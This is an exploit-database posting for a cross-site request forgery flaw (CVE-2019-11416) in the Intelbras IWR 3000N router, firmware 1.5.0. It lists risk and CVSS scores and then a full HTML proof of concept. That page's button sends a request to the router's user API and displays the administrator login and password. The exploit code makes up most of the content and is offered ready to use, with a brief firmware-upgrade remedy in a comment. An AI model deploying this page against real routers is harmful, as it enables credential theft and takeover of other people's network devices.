Intelbras IWR 3000N 1.5.0 Cross Site Request Forgery

2019.05.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- PoC based on CVE-2019-11416 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/ Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password. Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue. --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>IWR 3000N - CSRF on authenticated administrator</title> </head> <body> <button onclick="exploit()">Exploit!</button> <p>Click the button to get the login and password.</p> <script> function exploit(){ $.get( "http://localhost:80/v1/system/user" ) .done(( data ) => { alert( data ); }) .fail(function( err, status) { alert( status ); }); } </script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top